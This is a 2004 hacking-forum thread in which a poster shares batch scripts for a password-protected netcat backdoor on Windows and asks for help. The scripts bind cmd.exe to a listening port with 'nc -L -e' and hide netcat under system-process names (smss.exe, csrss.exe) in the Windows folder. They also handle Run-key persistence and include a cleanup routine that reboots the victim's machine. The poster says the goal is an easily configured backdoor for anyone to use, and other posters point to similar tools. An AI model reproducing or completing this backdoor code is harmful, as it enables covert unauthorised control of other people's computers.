Netcat Alternative

tstngry

Sep 11 2004, 06:06 AM

- I need a porgram like or exactly like netcat, that executes .bat files correctly. I made a simple .bat file that reads a password from a file called config.dat, which is just a text file with a password and port in it. Then it requires you to enter that password to get a shell i.e. run cmd.exe. The problem is netcat just goes ahead and runs cmd by itself. It does the same thing when i add options after the login, it just skips the login and goes right to the options.

- In conclusion, i need a program that is similar to netcat that executes .bat files correctly. If somone could make a similar thing or mod netcat THAT WOULD BE GREAT!. Also if you would like me to post the .bat files i can do that also. If this doesnt make sense then tell me that too. Thnx for your help

Phil

Sep 11 2004, 06:27 AM

hmm man i posted sbd a netcat clone in trial forum.. but of course use the search here is already 2 version of netcat with password auth. posted one with bats and the other one with another exe stuff like that

Tyrano

Sep 11 2004, 07:31 AM

maybe im confused, but why can't you transfer your batch file via netcat? it seems fairly simple to me; i mean if you got netcat to run on the target, why do you think the batch file won't run?

Partizaan

Sep 11 2004, 03:54 PM

I have something like that

Pm me you mail of give me an ftp and i will up it to ya ...

Or if somebody has webspace i will up it for everybody ...

Lanig

Sep 11 2004, 04:38 PM

why dont just use cryptcat -k option?
link:
http://sourceforge.net/projects/cryptcat/

tstngry

Sep 11 2004, 10:25 PM

-Thanks for all the help. The problem is not that i cant get the .bat to run it is that it does not run correctly. I added password protection of sorts to it, but it just skips over it. I use the command nc.exe -L -p 60000 -t -e login.bat.

CODE

@echo off
color 2
:start
cls

if "%1"=="/c" goto :commandl
if "%1"=="/r" goto :remove

set /p tst=%1
if "%tst%"=="r" goto :rage
goto :start

:rage
FOR /F "TOKENS=2* DELIMS=:" %%A IN ('type config.dat ^| FIND "pass"') DO FOR %%B IN (%%A) DO SET passwd=%%B
cls
echo.
echo.
echo 8 888888888o. .8. ,o888888o. 8 8888888888
echo 8 8888 `88. .888. 8888 `88. 8 8888
echo 8 8888 `88 :88888. ,8 8888 `8. 8 8888
echo 8 8888 ,88 . `88888. 88 8888 8 8888
echo 8 8888. ,88' .8. `88888. 88 8888 8 888888888888
echo 8 888888888P' .8`8. `88888. 88 8888 8 8888
echo 8 8888`8b .8' `8. `88888. 88 8888 8888888 8 8888
echo 8 8888 `8b. .8' `8. `88888. `8 8888 .8' 8 8888
echo 8 8888 `8b. .888888888. `88888. 8888 ,88' 8 8888
echo 8 8888 `88. .8' `8. `88888. `8888888P' 8 888888888888
echo.
echo.
set /p ri= #:
if "%ri%"=="%passwd%" cmd
GOTO :rage

:remove
attrib -s -h -r -a c:\windows\config.dat
attrib -s -h -r -a c:\windows\login.bat
attrib -s -h -r -a c:\windows\csrss.exe
attrib -s -h -r -a c:\windows\smss.exe
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /f
del config.dat
del smss.exe
echo del c:\windows\csrss.exe >> c:\clean.bat
echo del c:\windows\login.bat >> c:\clean.bat
echo REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v clean /f >> c:\clean.bat
echo del c:\clean.bat >> c:\clean.bat
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v clean /t REG_SZ /d "c:\clean.bat" /f
:pick
cls
echo.
echo.
echo Everything is set to be removed but you must restart their computer. You
echo can do it now or you can let them do it later.
echo.
set /p ans= Do you want to restart now? (y or n):
if "%ans%"=="y" shutdown -r -f -t 00
if "%ans%"=="n" GOTO :option
goto :pick

:commandl
@echo off
FOR /F "TOKENS=2* DELIMS=:" %%A IN ('type c:\windows\config.dat ^| FIND "port"') DO FOR %%B IN (%%A) DO SET port=%%B
c:\windows\smss.exe csrss.exe -L -p %port% -t -e c:\windows\login.bat
exit

Now this reads a password from a file called config.dat in the form of:

CODE

pass: password
port: 32

-When i execute this .bat file normally in windows i have no problems, but when netcat executes it when i connect to the port, it just gives the shell automatically. I am aware of other .bat files that have password protection, but i just wanted to know why this didnt work and/or if someone could make it work. Thanks again

-BTW the whole point of this is to make a simple backdoor that can be esily configured for everyone to use. I would be happy to post it and how to use it when i am finished.

saetji

Sep 11 2004, 11:41 PM

Problem I had with bat files was that * as a password worked

tstngry

Sep 12 2004, 01:38 AM

- When i get mine to work it doesnt have the problem of the * password. I have a much more simple one that works without the * password. It is:

CODE

@echo off
color 2
:rage
cls
echo.
echo.
echo 8 888888888o. .8. ,o888888o. 8 8888888888
echo 8 8888 `88. .888. 8888 `88. 8 8888
echo 8 8888 `88 :88888. ,8 8888 `8. 8 8888
echo 8 8888 ,88 . `88888. 88 8888 8 8888
echo 8 8888. ,88' .8. `88888. 88 8888 8 888888888888
echo 8 888888888P' .8`8. `88888. 88 8888 8 8888
echo 8 8888`8b .8' `8. `88888. 88 8888 8888888 8 8888
echo 8 8888 `8b. .8' `8. `88888. `8 8888 .8' 8 8888
echo 8 8888 `8b. .888888888. `88888. 8888 ,88' 8 8888
echo 8 8888 `88. .8' `8. `88888. `8888888P' 8 888888888888
echo.
echo.
set /p ri= #:
if "%ri%"=="yourpwhere" cmd
GOTO :rage

-I am pretty sure that works.